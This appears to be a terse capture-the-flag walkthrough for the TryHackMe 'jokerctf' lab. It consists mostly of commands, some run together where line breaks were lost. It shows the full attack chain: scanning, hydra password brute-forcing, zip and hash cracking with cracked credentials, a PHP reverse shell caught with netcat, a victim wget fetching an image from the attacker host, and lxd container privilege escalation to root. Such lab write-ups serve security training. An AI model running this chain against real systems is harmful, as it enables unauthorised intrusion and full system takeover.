Room Link: https://tryhackme.com/room/jokerctf
Kali
nmap -A $VICTIM
Kali
Kali
Kali
wasn't finding it but should have found a backup.zip
Kali
Kali
Kali
Hash
Kali
Browser
Kali
Kali
Get autocomplete
Victim
Kali
Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.
Victim
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txthydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 -f $VICTIM http-get /nikto -id joker:hannah -h $VICTIM:8080zip2john backup.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt
unzip backup.zip
Password: hannahcd db
cat joomladb.sql | grep admin$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbGjohn hash.txt --wordlist=/usr/share/wordlists/rockyou.txtUsername: admin
Password: abcd1234git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.phpnc -lvnp 1234python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgidgit clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81cd /tmp
wget http://$KALI:81/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id